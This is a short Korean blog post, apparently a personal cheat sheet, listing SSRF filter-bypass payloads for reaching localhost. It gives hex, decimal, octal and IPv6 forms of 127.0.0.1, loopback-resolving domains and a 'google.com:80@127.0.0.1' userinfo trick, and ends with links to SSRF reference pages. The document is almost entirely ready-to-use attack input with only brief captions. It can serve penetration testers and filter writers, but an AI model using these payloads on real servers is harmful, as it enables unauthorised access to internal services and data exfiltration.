본문 바로가기

SSRF localhost, 127.0.0.1 bypass

http://vcap.me:1530
http://0x7f.0x00.0x00.0x01:1530
http://0x7f000001:1530
http://2130706433:1530
http://Localhost:1530

고수가 우회하는법

 

http://127.0.0.1
http://0.0.0.0
http://localhost
http://[::]
http://0000::1
http://spoofed.burpcollaborator.net
http://localtest.me
http://localhost.hahwul.com
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://0/
http://127.1
http://127.0.1
http://2130706433
http://0177.0.0.1
http://o177.0.0.1
http://0o177.0.0.1
http://q177.0.0.1
http://[0:0:0:0:0:ffff:127.0.0.1] #IPv6

인터넷에서 찾은것

 

 

http://google.com:80@127.0.0.1:3333/

redirect를 이용한것

request시 @앞의값은 무시되고 127.0.0.1:3333로 가게 된다.

 

더 다양한 우회

https://www.hahwul.com/cullinan/ssrf/

 

SSRF (Server-Side Request Forgery)

🔍 Introduction SSRF는 Server-Side Request Forgery의 약자로 백엔드 서버단에서 요청을 발생시켜 내부시스템에 접근하거나 외부로 데이터를 유출할 수 있는 공격 방법입니다. Why? 서비스 기능에 따라서 pr

www.hahwul.com

https://umbum.dev/473

 

SSRF

Server Side Request Forgery 웹 어플리케이션이 외부로 request를 보낼 대상을 설정할 때, 뿐만 아니라 외부로 request를 보낼 수 있는 함수를 사용할 때 인자에 user input이 들어간다면 발생할 수 있다. PHP..

umbum.dev